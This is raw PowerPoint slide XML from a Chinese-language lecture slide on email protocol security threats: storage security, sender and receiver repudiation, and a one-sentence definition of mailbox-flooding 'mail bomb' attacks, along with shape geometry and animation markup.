            <a:srgbClr val="2AA1BF"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="104472" tIns="104472" rIns="104472" bIns="104472"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储存安全</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60421" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="2760663"/>
            <a:ext cx="7570787" cy="341312"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7571184"/>
              <a:gd name="T1" fmla="*/ 0 h 341550"/>
              <a:gd name="T2" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T3" fmla="*/ 0 h 341550"/>
              <a:gd name="T4" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T5" fmla="*/ 339413 h 341550"/>
              <a:gd name="T6" fmla="*/ 0 w 7571184"/>
              <a:gd name="T7" fmla="*/ 339413 h 341550"/>
              <a:gd name="T8" fmla="*/ 0 w 7571184"/>
              <a:gd name="T9" fmla="*/ 0 h 341550"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 7571184"/>
              <a:gd name="T16" fmla="*/ 0 h 341550"/>
              <a:gd name="T17" fmla="*/ 7571184 w 7571184"/>
              <a:gd name="T18" fmla="*/ 341550 h 341550"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="7571184" h="341550">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7571184" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7571184" y="341550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3415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385" tIns="25400" rIns="142240" bIns="254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如同于其它文件的储存安全一样，重点在于防范非授权使用</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60422" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="3101975"/>
            <a:ext cx="7570787" cy="577850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7571184"/>
              <a:gd name="T1" fmla="*/ 94594 h 579149"/>
              <a:gd name="T2" fmla="*/ 28263 w 7571184"/>
              <a:gd name="T3" fmla="*/ 27707 h 579149"/>
              <a:gd name="T4" fmla="*/ 96482 w 7571184"/>
              <a:gd name="T5" fmla="*/ 0 h 579149"/>
              <a:gd name="T6" fmla="*/ 7471128 w 7571184"/>
              <a:gd name="T7" fmla="*/ 0 h 579149"/>
              <a:gd name="T8" fmla="*/ 7539350 w 7571184"/>
              <a:gd name="T9" fmla="*/ 27707 h 579149"/>
              <a:gd name="T10" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T11" fmla="*/ 94594 h 579149"/>
              <a:gd name="T12" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T13" fmla="*/ 472967 h 579149"/>
              <a:gd name="T14" fmla="*/ 7539350 w 7571184"/>
              <a:gd name="T15" fmla="*/ 539855 h 579149"/>
              <a:gd name="T16" fmla="*/ 7471128 w 7571184"/>
              <a:gd name="T17" fmla="*/ 567563 h 579149"/>
              <a:gd name="T18" fmla="*/ 96482 w 7571184"/>
              <a:gd name="T19" fmla="*/ 567563 h 579149"/>
              <a:gd name="T20" fmla="*/ 28263 w 7571184"/>
              <a:gd name="T21" fmla="*/ 539855 h 579149"/>
              <a:gd name="T22" fmla="*/ 0 w 7571184"/>
              <a:gd name="T23" fmla="*/ 472967 h 579149"/>
              <a:gd name="T24" fmla="*/ 0 w 7571184"/>
              <a:gd name="T25" fmla="*/ 94594 h 579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71184"/>
              <a:gd name="T40" fmla="*/ 0 h 579149"/>
              <a:gd name="T41" fmla="*/ 7571184 w 7571184"/>
              <a:gd name="T42" fmla="*/ 579149 h 579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71184" h="579149">
                <a:moveTo>
                  <a:pt x="0" y="96527"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="70926"/>
                  <a:pt x="10170" y="46374"/>
                  <a:pt x="28272" y="28272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46374" y="10170"/>
                  <a:pt x="70926" y="0"/>
                  <a:pt x="96527" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7474657" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7500258" y="0"/>
                  <a:pt x="7524810" y="10170"/>
                  <a:pt x="7542912" y="28272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7561014" y="46374"/>
                  <a:pt x="7571184" y="70926"/>
                  <a:pt x="7571184" y="96527"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7571184" y="482622"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7571184" y="508223"/>
                  <a:pt x="7561014" y="532775"/>
                  <a:pt x="7542912" y="550877"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7524810" y="568979"/>
                  <a:pt x="7500258" y="579149"/>
                  <a:pt x="7474657" y="579149"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96527" y="579149"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="70926" y="579149"/>
                  <a:pt x="46374" y="568979"/>
                  <a:pt x="28272" y="550877"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10170" y="532775"/>
                  <a:pt x="0" y="508223"/>
                  <a:pt x="0" y="482622"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="96527"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2AA1BF"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="104472" tIns="104472" rIns="104472" bIns="104472"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发送者身份确认</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60423" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="3681413"/>
            <a:ext cx="7570787" cy="341312"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7571184"/>
              <a:gd name="T1" fmla="*/ 0 h 341550"/>
              <a:gd name="T2" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T3" fmla="*/ 0 h 341550"/>
              <a:gd name="T4" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T5" fmla="*/ 339413 h 341550"/>
              <a:gd name="T6" fmla="*/ 0 w 7571184"/>
              <a:gd name="T7" fmla="*/ 339413 h 341550"/>
              <a:gd name="T8" fmla="*/ 0 w 7571184"/>
              <a:gd name="T9" fmla="*/ 0 h 341550"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 7571184"/>
              <a:gd name="T16" fmla="*/ 0 h 341550"/>
              <a:gd name="T17" fmla="*/ 7571184 w 7571184"/>
              <a:gd name="T18" fmla="*/ 341550 h 341550"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="7571184" h="341550">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7571184" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7571184" y="341550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3415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385" tIns="25400" rIns="142240" bIns="254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发送者可能抵赖说他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>她没有发送电子邮件，借此电传播脑病毒和诈骗信息</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60424" name="Freeform 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="4022725"/>
            <a:ext cx="7570787" cy="577850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7571184"/>
              <a:gd name="T1" fmla="*/ 94594 h 579149"/>
              <a:gd name="T2" fmla="*/ 28263 w 7571184"/>
              <a:gd name="T3" fmla="*/ 27707 h 579149"/>
              <a:gd name="T4" fmla="*/ 96482 w 7571184"/>
              <a:gd name="T5" fmla="*/ 0 h 579149"/>
              <a:gd name="T6" fmla="*/ 7471128 w 7571184"/>
              <a:gd name="T7" fmla="*/ 0 h 579149"/>
              <a:gd name="T8" fmla="*/ 7539350 w 7571184"/>
              <a:gd name="T9" fmla="*/ 27707 h 579149"/>
              <a:gd name="T10" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T11" fmla="*/ 94594 h 579149"/>
              <a:gd name="T12" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T13" fmla="*/ 472967 h 579149"/>
              <a:gd name="T14" fmla="*/ 7539350 w 7571184"/>
              <a:gd name="T15" fmla="*/ 539855 h 579149"/>
              <a:gd name="T16" fmla="*/ 7471128 w 7571184"/>
              <a:gd name="T17" fmla="*/ 567563 h 579149"/>
              <a:gd name="T18" fmla="*/ 96482 w 7571184"/>
              <a:gd name="T19" fmla="*/ 567563 h 579149"/>
              <a:gd name="T20" fmla="*/ 28263 w 7571184"/>
              <a:gd name="T21" fmla="*/ 539855 h 579149"/>
              <a:gd name="T22" fmla="*/ 0 w 7571184"/>
              <a:gd name="T23" fmla="*/ 472967 h 579149"/>
              <a:gd name="T24" fmla="*/ 0 w 7571184"/>
              <a:gd name="T25" fmla="*/ 94594 h 579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71184"/>
              <a:gd name="T40" fmla="*/ 0 h 579149"/>
              <a:gd name="T41" fmla="*/ 7571184 w 7571184"/>
              <a:gd name="T42" fmla="*/ 579149 h 579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71184" h="579149">
                <a:moveTo>
                  <a:pt x="0" y="96527"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="70926"/>
                  <a:pt x="10170" y="46374"/>
                  <a:pt x="28272" y="28272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46374" y="10170"/>
                  <a:pt x="70926" y="0"/>
                  <a:pt x="96527" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7474657" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7500258" y="0"/>
                  <a:pt x="7524810" y="10170"/>
                  <a:pt x="7542912" y="28272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7561014" y="46374"/>
                  <a:pt x="7571184" y="70926"/>
                  <a:pt x="7571184" y="96527"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7571184" y="482622"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7571184" y="508223"/>
                  <a:pt x="7561014" y="532775"/>
                  <a:pt x="7542912" y="550877"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7524810" y="568979"/>
                  <a:pt x="7500258" y="579149"/>
                  <a:pt x="7474657" y="579149"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96527" y="579149"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="70926" y="579149"/>
                  <a:pt x="46374" y="568979"/>
                  <a:pt x="28272" y="550877"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10170" y="532775"/>
                  <a:pt x="0" y="508223"/>
                  <a:pt x="0" y="482622"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="96527"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2AA1BF"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="104472" tIns="104472" rIns="104472" bIns="104472"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接收者已收到确认</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60425" name="Freeform 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="4600575"/>
            <a:ext cx="7570787" cy="342900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7571184"/>
              <a:gd name="T1" fmla="*/ 0 h 341550"/>
              <a:gd name="T2" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T3" fmla="*/ 0 h 341550"/>
              <a:gd name="T4" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T5" fmla="*/ 353893 h 341550"/>
              <a:gd name="T6" fmla="*/ 0 w 7571184"/>
              <a:gd name="T7" fmla="*/ 353893 h 341550"/>
              <a:gd name="T8" fmla="*/ 0 w 7571184"/>
              <a:gd name="T9" fmla="*/ 0 h 341550"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 7571184"/>
              <a:gd name="T16" fmla="*/ 0 h 341550"/>
              <a:gd name="T17" fmla="*/ 7571184 w 7571184"/>
              <a:gd name="T18" fmla="*/ 341550 h 341550"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="7571184" h="341550">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7571184" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7571184" y="341550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3415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385" tIns="25400" rIns="142240" bIns="254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接收者可能抵赖说他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>她没有收到电子邮件</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60426" name="Freeform 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="4943475"/>
            <a:ext cx="7570787" cy="577850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7571184"/>
              <a:gd name="T1" fmla="*/ 94594 h 579149"/>
              <a:gd name="T2" fmla="*/ 28263 w 7571184"/>
              <a:gd name="T3" fmla="*/ 27707 h 579149"/>
              <a:gd name="T4" fmla="*/ 96482 w 7571184"/>
              <a:gd name="T5" fmla="*/ 0 h 579149"/>
              <a:gd name="T6" fmla="*/ 7471128 w 7571184"/>
              <a:gd name="T7" fmla="*/ 0 h 579149"/>
              <a:gd name="T8" fmla="*/ 7539350 w 7571184"/>
              <a:gd name="T9" fmla="*/ 27707 h 579149"/>
              <a:gd name="T10" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T11" fmla="*/ 94594 h 579149"/>
              <a:gd name="T12" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T13" fmla="*/ 472967 h 579149"/>
              <a:gd name="T14" fmla="*/ 7539350 w 7571184"/>
              <a:gd name="T15" fmla="*/ 539855 h 579149"/>
              <a:gd name="T16" fmla="*/ 7471128 w 7571184"/>
              <a:gd name="T17" fmla="*/ 567563 h 579149"/>
              <a:gd name="T18" fmla="*/ 96482 w 7571184"/>
              <a:gd name="T19" fmla="*/ 567563 h 579149"/>
              <a:gd name="T20" fmla="*/ 28263 w 7571184"/>
              <a:gd name="T21" fmla="*/ 539855 h 579149"/>
              <a:gd name="T22" fmla="*/ 0 w 7571184"/>
              <a:gd name="T23" fmla="*/ 472967 h 579149"/>
              <a:gd name="T24" fmla="*/ 0 w 7571184"/>
              <a:gd name="T25" fmla="*/ 94594 h 579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71184"/>
              <a:gd name="T40" fmla="*/ 0 h 579149"/>
              <a:gd name="T41" fmla="*/ 7571184 w 7571184"/>
              <a:gd name="T42" fmla="*/ 579149 h 579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71184" h="579149">
                <a:moveTo>
                  <a:pt x="0" y="96527"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="70926"/>
                  <a:pt x="10170" y="46374"/>
                  <a:pt x="28272" y="28272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46374" y="10170"/>
                  <a:pt x="70926" y="0"/>
                  <a:pt x="96527" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7474657" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7500258" y="0"/>
                  <a:pt x="7524810" y="10170"/>
                  <a:pt x="7542912" y="28272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7561014" y="46374"/>
                  <a:pt x="7571184" y="70926"/>
                  <a:pt x="7571184" y="96527"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7571184" y="482622"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7571184" y="508223"/>
                  <a:pt x="7561014" y="532775"/>
                  <a:pt x="7542912" y="550877"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7524810" y="568979"/>
                  <a:pt x="7500258" y="579149"/>
                  <a:pt x="7474657" y="579149"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96527" y="579149"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="70926" y="579149"/>
                  <a:pt x="46374" y="568979"/>
                  <a:pt x="28272" y="550877"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10170" y="532775"/>
                  <a:pt x="0" y="508223"/>
                  <a:pt x="0" y="482622"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="96527"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2AA1BF"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="104472" tIns="104472" rIns="104472" bIns="104472"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eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>邮箱炸弹攻击</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60427" name="Freeform 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="5521325"/>
            <a:ext cx="7570787" cy="581025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7571184"/>
              <a:gd name="T1" fmla="*/ 0 h 579600"/>
              <a:gd name="T2" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T3" fmla="*/ 0 h 579600"/>
              <a:gd name="T4" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T5" fmla="*/ 592553 h 579600"/>
              <a:gd name="T6" fmla="*/ 0 w 7571184"/>
              <a:gd name="T7" fmla="*/ 592553 h 579600"/>
              <a:gd name="T8" fmla="*/ 0 w 7571184"/>
              <a:gd name="T9" fmla="*/ 0 h 579600"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 7571184"/>
              <a:gd name="T16" fmla="*/ 0 h 579600"/>
              <a:gd name="T17" fmla="*/ 7571184 w 7571184"/>
              <a:gd name="T18" fmla="*/ 579600 h 579600"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="7571184" h="579600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7571184" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7571184" y="579600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="579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0385" tIns="25400" rIns="142240" bIns="2540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marL="171450" indent="-17145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lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="20000"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>发送大量无意义的邮件给受害者，耗尽其电子邮箱的存储空间，从而该电子邮箱无法继续接收邮件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158733" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>电子邮件协议安全威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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0426"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60426"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60426"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6042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0424"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
